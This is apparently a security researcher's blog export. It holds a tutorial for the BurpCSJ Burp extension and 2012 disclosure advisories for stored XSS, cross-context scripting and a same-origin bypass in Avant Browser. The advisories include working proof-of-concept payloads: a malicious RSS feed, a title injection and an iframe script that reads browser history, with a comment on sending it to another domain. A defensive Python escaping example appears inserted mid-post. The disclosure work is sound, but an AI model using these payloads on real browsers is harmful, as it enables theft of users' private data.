<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/x51jwZ1HV9E?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/X3mjheLJEFE?feature=player_embedded' frameborder='0'></iframe><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/mKOD3ysiN-U?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com4tag:blogger.com,1999:blog-5593108060941425908.post-75199492908620183722013-09-09T23:08:00.000+02:002015-02-09T22:26:50.767+01:00BurpCSJ Tutorial - Using CrawljaxThis is a simple tutorial to get you started with BurpCSJ and Crawljax.<br />
<br />
Installation is easy - just <a href="http://bit.ly/burpcsj0-3">download</a> BurpCSJ and import it into Burp via the Extender tab, as shown below:<br />
<br />
Extender -> Add -> Choose File<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdXBgOpopmWT5TVqSIFJbi-00qYHZ63WJv36115opa__e2N1iFZWzBp-LO_72ck_m0qhFvh93D1H7qKdvf5-yhPO7OnMlr41-09FInjh3cmzOyzx__4IHW6-APKj4auSUeYLKHAP0zFi8/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdXBgOpopmWT5TVqSIFJbi-00qYHZ63WJv36115opa__e2N1iFZWzBp-LO_72ck_m0qhFvh93D1H7qKdvf5-yhPO7OnMlr41-09FInjh3cmzOyzx__4IHW6-APKj4auSUeYLKHAP0zFi8/s320/s1.png" height="139" width="320" /></a></div>
<br />
<br />
Once the extension is loaded, two new tabs will appear on the right side:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhe9dbMkBErR0DFVXdHnuWQMjyKCUEbBkuTBSi6rfPd3k4EyqNUUzXITJz7OmNrfw4cijs0iEu7icHjcvdiSSQ34Vw1BEzVxloN0Et6SQbnxRS4TIo_12R8G0SzY_7OLuPX7KQnVj-_Cc/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhe9dbMkBErR0DFVXdHnuWQMjyKCUEbBkuTBSi6rfPd3k4EyqNUUzXITJz7OmNrfw4cijs0iEu7icHjcvdiSSQ34Vw1BEzVxloN0Et6SQbnxRS4TIo_12R8G0SzY_7OLuPX7KQnVj-_Cc/s320/s2.png" height="168" width="320" /></a></div>
<br />
<br />
<b style="line-height: 25px;">Start crawling</b><br />
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">To start crawling, grab a URL item from any Burp tab (e.g. proxy history), right-click on the item and choose "Send URL to Crawljax", as shown below:</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfpNp5UcmVTkOV7veWGiI46YNHMWowJmXHaW_wdKvTqmWN9CmGoa0Q9_mluFqM05X8oDQlvyZN9MigTeYgABDnN_vu-V0Exdw6coC_S09nm1CYUHshbHM0L8Jd7yDw1wCuwvKBmDvwbY/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfpNp5UcmVTkOV7veWGiI46YNHMWowJmXHaW_wdKvTqmWN9CmGoa0Q9_mluFqM05X8oDQlvyZN9MigTeYgABDnN_vu-V0Exdw6coC_S09nm1CYUHshbHM0L8Jd7yDw1wCuwvKBmDvwbY/s320/s4.png" height="320" width="229" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">After this, a Crawljax session will start based on the settings configured via the Crawljax tab.</span></div>
<div>
<span style="line-height: 25px;">It is always recommended to choose a web root URL item for Crawljax e.g. http://yoursite.xxx/ instead of a specific page or folder. This is typically the URL that you have configured under Target/Scope in Burp.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<b>Crawling with a different browser</b><br />
<br />
Under the Crawljax tab, it is possible to configure the path to the browser drivers, proxy settings and other options for Crawljax.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMMbOGoXLMIPEdaKyHa8HmF42W5Lvc_oMe-M7QgBpQxTkDZdtFlCHa4qYRxTusLSNkqY5TBrR6usUKJvsSO44qLDUoFF10Alpqyqm-zicDEKZvry6V-L0BNUSf3j0o1Dc7uhC9Iej68C8/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMMbOGoXLMIPEdaKyHa8HmF42W5Lvc_oMe-M7QgBpQxTkDZdtFlCHa4qYRxTusLSNkqY5TBrR6usUKJvsSO44qLDUoFF10Alpqyqm-zicDEKZvry6V-L0BNUSf3j0o1Dc7uhC9Iej68C8/s320/s3.png" height="320" width="272" /></a></div>
<br />
<span style="font-family: inherit;">If you need to use a different browser with Crawljax, then you would need to add the relevant drivers or executables:</span><br />
<ul style="line-height: 25px; margin: 15px 0px; padding: 0px 0px 0px 30px;">
<li><span style="font-family: inherit;">Chrome driver: <a href="https://code.google.com/p/chromedriver/downloads/list" style="text-decoration: none;">https://code.google.com/p/chromedriver/downloads/list</a></span></li>
<li><span style="font-family: inherit;">IE Driver: <a href="https://code.google.com/p/selenium/downloads/list" style="text-decoration: none;">https://code.google.com/p/selenium/downloads/list</a></span></li>
<li>PhantomJS: <a href="http://phantomjs.org/download.html">http://phantomjs.org/download.html</a></li>
</ul>
<div>
<span style="line-height: 25px;">In this example, let's use the Chrome driver:</span></div>
</div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU-DN6SkbdhJJyivPCCxVhtcXCqLbKTUulYzHJLX8ZR4IEPORX_w2fL308PB4Vc4NkR5hW23vN7FwJr9uPYnsmQhVCp6bL6usrRht3j5NXoZoFXj1h7W-z0zLddUQd1k_7keT-jtTbEgA/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU-DN6SkbdhJJyivPCCxVhtcXCqLbKTUulYzHJLX8ZR4IEPORX_w2fL308PB4Vc4NkR5hW23vN7FwJr9uPYnsmQhVCp6bL6usrRht3j5NXoZoFXj1h7W-z0zLddUQd1k_7keT-jtTbEgA/s320/s5.png" height="233" width="320" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjfHrtfigPnyxvbRFUABcXsiYPtyn-YO31LhHwg8hHibPcd5kuZpZ5Up6I3Q-mixPiRIIiFIFRAEd2DaolVtFH8reBYMT5N1PEJJjBLvZHHWbDM7G72Hr_LEqLC3QfyRbsYsmp53RzwU/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjfHrtfigPnyxvbRFUABcXsiYPtyn-YO31LhHwg8hHibPcd5kuZpZ5Up6I3Q-mixPiRIIiFIFRAEd2DaolVtFH8reBYMT5N1PEJJjBLvZHHWbDM7G72Hr_LEqLC3QfyRbsYsmp53RzwU/s1600/s6.png" /></a></div>
<div>
<span style="line-height: 25px;">Once Chrome is selected, you can start Crawljax with Chrome as described in the previous step.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Crawling application with login/authentication</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">If you are testing a web application with login/authentication, then it is recommended to use the Burp cookie jar. This option allows BurpCSJ to pass cookies to Crawljax when crawling a site. If you already have session tokens in the cookie jar, then BurpCSJ will use those.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQqWaVAi0_QTG2bx76lmw8PcSLoGFN4OyAw-o4VUecx4x1YA5UAa73s43ScNT4NnHyGvtHrnlIWZEdC0_KAfTdAM0Ha3YLef8_yOksTN22t427K52pf2D5U5lhQ8Io6W9TcrmLNIKcKo/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQqWaVAi0_QTG2bx76lmw8PcSLoGFN4OyAw-o4VUecx4x1YA5UAa73s43ScNT4NnHyGvtHrnlIWZEdC0_KAfTdAM0Ha3YLef8_yOksTN22t427K52pf2D5U5lhQ8Io6W9TcrmLNIKcKo/s1600/s7.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<b style="line-height: 25px;">Exclusion list</b></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The exclusion list allows you to filter out unwanted pages, such as logout or signoff. More entries would be needed for complex applications, such as administrative interfaces where crawling might actually change or modify the application state.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTp5dj-rlizQlJvgrEDMvTIk5acTYgKXarKGkGNJEIV9oUQzzwtA5u_XJM2jiLf03xxzu8AFCEmU6Ze2v9oud04uUb7cd6rX1mcMj9KaeXN1JetD0EAkD3TLHz5LRxfKtc-85yE6f71z4/s1600/s8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTp5dj-rlizQlJvgrEDMvTIk5acTYgKXarKGkGNJEIV9oUQzzwtA5u_XJM2jiLf03xxzu8AFCEmU6Ze2v9oud04uUb7cd6rX1mcMj9KaeXN1JetD0EAkD3TLHz5LRxfKtc-85yE6f71z4/s1600/s8.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Setting crawling for HTML elements</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The last part allows more granular control over the HTML elements which are considered by Crawljax. By enabling more HTML elements, it is possible to apply the Crawljax logic against more elements. As a consequence, the Crawljax session would probably take longer to complete.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvV7CdCtYTfXBDm47tZVYCFCo2sZwJl_prwpFD1KzMhXWrpU_Wuld7eetUwYYvo1TMC9QGCYwuT-TCziYcOgSPI2z_GUdBvkdCcZWL7kv6wSRP6rb3yueUibG2_hWZfZQR4MZ9tYNZnKg/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvV7CdCtYTfXBDm47tZVYCFCo2sZwJl_prwpFD1KzMhXWrpU_Wuld7eetUwYYvo1TMC9QGCYwuT-TCziYcOgSPI2z_GUdBvkdCcZWL7kv6wSRP6rb3yueUibG2_hWZfZQR4MZ9tYNZnKg/s1600/s9.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Generating a report of crawling session</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The CrawlOverview plugin can be invoked and an output folder needs to be set. At the end of the Crawljax session, the report will be generated under that folder.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6LgwSXsT4VoQwZxhCOedJgO3YBtZAsY3_SmT0bnV87wIF-PX-FpJwT1cr1_s0tf1HqeWGJo7jpbyueNbRhLU9NoME9ugqzWQdhaTXYX7es6ZgYZ3Rnzy8pTCUnEJme2y0hezx9DBm_I/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6LgwSXsT4VoQwZxhCOedJgO3YBtZAsY3_SmT0bnV87wIF-PX-FpJwT1cr1_s0tf1HqeWGJo7jpbyueNbRhLU9NoME9ugqzWQdhaTXYX7es6ZgYZ3Rnzy8pTCUnEJme2y0hezx9DBm_I/s1600/s10.png" /></a></div>
<div>
<span style="line-height: 25px;">An example of CrawlOverview output can be seen here: </span><a href="http://crawls.crawljax.com/">http://crawls.crawljax.com/</a></div>
<div>
<br /></div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com1tag:blogger.com,1999:blog-5593108060941425908.post-68418212842812892602012-12-05T20:32:00.001+01:002012-12-05T20:32:14.046+01:00Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)<br />
<b>Details</b><br />
<br />
Vendor Site: Avant browser (www.avantbrowser.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<b><br /></b>
<b>Stored Cross Site
Scripting - Feed Reader (browser://localhost/lst?*)</b><br />
<br />
A malicious user can inject and store arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following:<br />
<div class="Verdana9pt">
<ul>
<li><b><span style="color: red;"><title></span></b> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using an HTML-encoded payload</li>
<li><span style="color: red;"><b><link></b></span> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using a javascript: pseudo-URI (this is rendered in the about:blank zone)</li>
<li><span style="color: red;"><b><description></b></span> element: JavaScript injection using an HTML-encoded payload</li>
</ul>
</div>
The following is an example of a malicious RSS feed:<br />
<br />
<i><?xml version='1.0' encoding="ISO-8859-1"?></i><br />
<i><rss version='2.0'></i><br />
<i><channel></i><br />
<i><description>Malerisch.net</description></i><br />
<i><link>http://blog.malerisch.net/</link></i><br />
<i><title>Malerisch.net</title></i><br />
<i><item></i><br />
<i> <title>browser security&gt;&lt;img src=a onerror='alert(1);' ;&gt;</title></i><br />
<i> <link>javascript:alert(window.location);</link></i><br />
<i> <description>07/09/2008 - I have done some research in the area of browser security and presented this argument at the last OWASP NZ meeting.&lt;img src=a onerror='alert(2);';&gt;</i><br />
<i> <span class="Apple-tab-span" style="white-space: pre;"> </span></description></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate></i><br />
<i></item></i><br />
<i></channel></i><br />
<i></rss></i><br />
<div>
<br /></div>
<div>
Injection is possible in a single case: the user views a malicious feed using the Avant Feed Reader built-in component.</div>
<div>
<br /></div>
<div>
The Feed Reader is located at the feed:// URI scheme (e.g. feed://localhost/browser/avent/rss.xml). Note that the feed URL has to be subscribed to in order to be rendered under the feed: URI. Also, the feed:// URI scheme is mapped to browser://localhost/lst?domain.name/path/to/rss.feed.</div>
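For reference, this is how a feed reader should treat the three elements listed above. It is an added example, not Avant's code: items are parsed with Python's standard library, text nodes are HTML-escaped before being placed in markup, and the link is kept only if its scheme is http or https. The sample feed is a constructed, shortened copy of the one shown above; the vulnerable renderer is included only to show what the fix changes.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample feed: the three injection points named in the advisory
# (<title>, <link>, <description>), with the description text shortened.
MALICIOUS_FEED = """<?xml version='1.0' encoding="ISO-8859-1"?>
<rss version='2.0'>
<channel>
<description>Malerisch.net</description>
<link>http://blog.malerisch.net/</link>
<title>Malerisch.net</title>
<item>
  <title>browser security&gt;&lt;img src=a onerror='alert(1);' ;&gt;</title>
  <link>javascript:alert(window.location);</link>
  <description>07/09/2008 - browser security notes&lt;img src=a onerror='alert(2);';&gt;</description>
  <pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
</item>
</channel>
</rss>"""

# Only navigable web schemes are acceptable for a feed item's link; anything
# else (javascript:, data:, vbscript:, browser:, ...) is dropped.
SAFE_LINK_SCHEMES = {"http", "https"}


def parse_items(feed_bytes):
    """Return the <item> children as dicts of plain text (entities already decoded)."""
    root = ET.fromstring(feed_bytes)
    return [
        {
            "title": item.findtext("title", default=""),
            "link": item.findtext("link", default=""),
            "description": item.findtext("description", default=""),
        }
        for item in root.iter("item")
    ]


def safe_link(url):
    """Return the stripped URL if its scheme is on the allow-list, otherwise None."""
    url = url.strip()
    return url if urlsplit(url).scheme.lower() in SAFE_LINK_SCHEMES else None


def render_item_unsafe(item):
    """The behaviour described in the advisory: decoded text concatenated into HTML.

    Because the XML parser has already turned &lt;img ...&gt; back into <img ...>,
    the payload becomes live markup and the javascript: link becomes a live href.
    """
    return '<a href="%s">%s</a><p>%s</p>' % (
        item["link"], item["title"], item["description"])


def render_item_safe(item):
    """Hardened rendering: escape every text node and allow-list the link scheme."""
    link = safe_link(item["link"])
    href = ' href="%s"' % html.escape(link, quote=True) if link else ""
    return "<a%s>%s</a><p>%s</p>" % (
        href,
        html.escape(item["title"], quote=True),
        html.escape(item["description"], quote=True),
    )


def sample_items():
    """Parse the constructed feed; encoded as latin-1 to honour its declaration."""
    return parse_items(MALICIOUS_FEED.encode("latin-1"))


if __name__ == "__main__":
    for entry in sample_items():
        print("unsafe:", render_item_unsafe(entry))
        print("safe:  ", render_item_safe(entry))
```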
<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be defined as a traditional Stored Cross Site Scripting vulnerability. Although the injection is rendered within an internal browser zone (mapped to browser://localhost/lst?domain.name/path/to/rss.feed), invocation of privileged commands does not appear to be possible, as SOP is correctly applied to the browser:// zone.<br />
<div>
<br />
<b>Video</b></div>
<br />
Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/-mShxsspxy8?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-42615803080831833402012-12-05T20:30:00.001+01:002012-12-05T20:30:37.295+01:00Avant Browser - Cross Context Scripting - browser:home - Most Visited And History Tabs<br />
<b>Details</b><br />
<br />
Vendor Site: Avant browser (www.avantbrowser.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 27 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting – browser:home – Most Visited And History Tabs</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code through the websites visited with the Avant Browser. The code injection is rendered into both the Most Visited and History tabs within the browser:home page, which displays the URL and the title of the page. A malicious user can inject and store JavaScript/HTML content by using the <title> HTML element, as shown below:<br />
<div class="Verdana9pt">
<br />
<i><title>aaa"><img src=a onerror='var vstr = {value: ""};window.navigator.AFRunCommand(60003, vstr);alert(vstr.value);'></title></i><br />
<br />
Injected payload is rendered in the history item, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIMEVTJzL1RwrvhoClKzvFw7sl8TOk0JcSYwWHUceoNyg7Ir1h_gdXd7-26fmzFAk7zuw8v98umYLjBCQ2NqD4GbnLPPbIQVdWrjzpVQgFyWUGNMuzk3blq9-xLWwhYI8k1r50NmEUsLM/s1600/avant_xcs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIMEVTJzL1RwrvhoClKzvFw7sl8TOk0JcSYwWHUceoNyg7Ir1h_gdXd7-26fmzFAk7zuw8v98umYLjBCQ2NqD4GbnLPPbIQVdWrjzpVQgFyWUGNMuzk3blq9-xLWwhYI8k1r50NmEUsLM/s1600/avant_xcs.png" /></a></div>
<br /></div>
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways depending on the user action. Two possible scenarios are described below:<br />
<br />
<b>Scenario 1</b><br />
<br />
User visits a malicious web page;<br />
User directly requests browser:home and clicks on “Most Visited” or “History” tab.<br />
<div>
<br /></div>
<div>
<b>Exploit</b></div>
<div>
<br /></div>
<div>
Stored malicious payload will be rendered from the browser: privileged browser zone and so it would be possible to bypass Same Origin Policy (SOP) protections, and access Avant Browser native JavaScript privileged functions which can be invoked from the window.navigator object (e.g. window.navigator.*). Such Avant Browser object interfaces can be used to read browser history, bookmarks, or modify Avant Browser configuration.</div>
<div>
<br /></div>
<div>
<b>Scenario 2</b></div>
<div>
<br /></div>
<div>
Clickjacking attack which tricks a user into clicking the “most visited” or “history” tab of the browser:home page rendered in a hidden iframe.</div>
<div>
<br /></div>
<div>
<b>Exploit</b></div>
<div>
<br /></div>
<div>
In this case, this can be considered a traditional stored Cross Site Scripting vulnerability, and SOP forbids execution of privileged commands.</div>
<div>
<br /></div>
<div>
<b>Video</b></div>
<br />
Avant Browser - Cross Context Scripting - browser:home - Most Visited And History Tabs<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/cHHtsOpYGH4?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<br />
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-562645140795802332012-12-05T20:29:00.002+01:002012-12-05T20:29:26.192+01:00Avant Browser - Same of Origin Policy Bypass - browser:home<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Details</b><br />
<br />
Vendor Site: Avant browser (www.avantbrowser.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Same Origin Policy Bypass</b><br />
<br />
A malicious user can execute arbitrary JavaScript/HTML code
on the privileged browser:home page from an untrusted web page on the Internet
(http:// zone). This is possible by creating an iframe element pointing to the
browser:home page and then invoking privileged commands using a window object
reference to the iframe element, as shown in the example below:<br />
<div class="Verdana9pt">
<br /></div>
<div class="Verdana9pt">
</div>
<div class="Verdana9pt">
<i><iframe name="test2" src="<b><span style="color: red;">browser:home</span></b>"></iframe></i></div>
<div class="Verdana9pt">
<i><script><b><span style="color: red;">window['test2'].navigator.AFRunCommand(id_of_privileged_command, vstr)</span></b></script></i></div>
<div>
<br /></div>
This code allows interaction from an untrusted zone (http://) to a trusted and privileged zone: browser:home.<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the privileged browser: zone, it is possible to bypass Same Origin Policy (SOP) protections and also to access Avant Browser native JavaScript privileged functions, which can be invoked through the window.navigator object (e.g. window.navigator.*). Such Avant Browser object interfaces can be used to read browser history and bookmarks, or to modify the Avant Browser configuration. Below is an example of code which reads the browser's history.<br />
<br />
<b>Exploit - Stealing browser's history</b><br />
<br />
<i><iframe name="test2" src="<span style="color: red;"><b>browser:home</b></span>"></iframe></i><br />
<i><script> var vstr = {value: ""}; window['test2'].navigator.AFRunCommand(<b><span style="color: red;">60003, vstr</span></b>); alert(vstr.value);</i><br />
<i>//send vstr.value via an img src to another domain </script></i><br />
<div>
<br />
<b>BeEF module</b><br />
<b><br /></b>
A BeEF module has been developed which steals the history of the Avant browser. The BeEF module can be found below:<br />
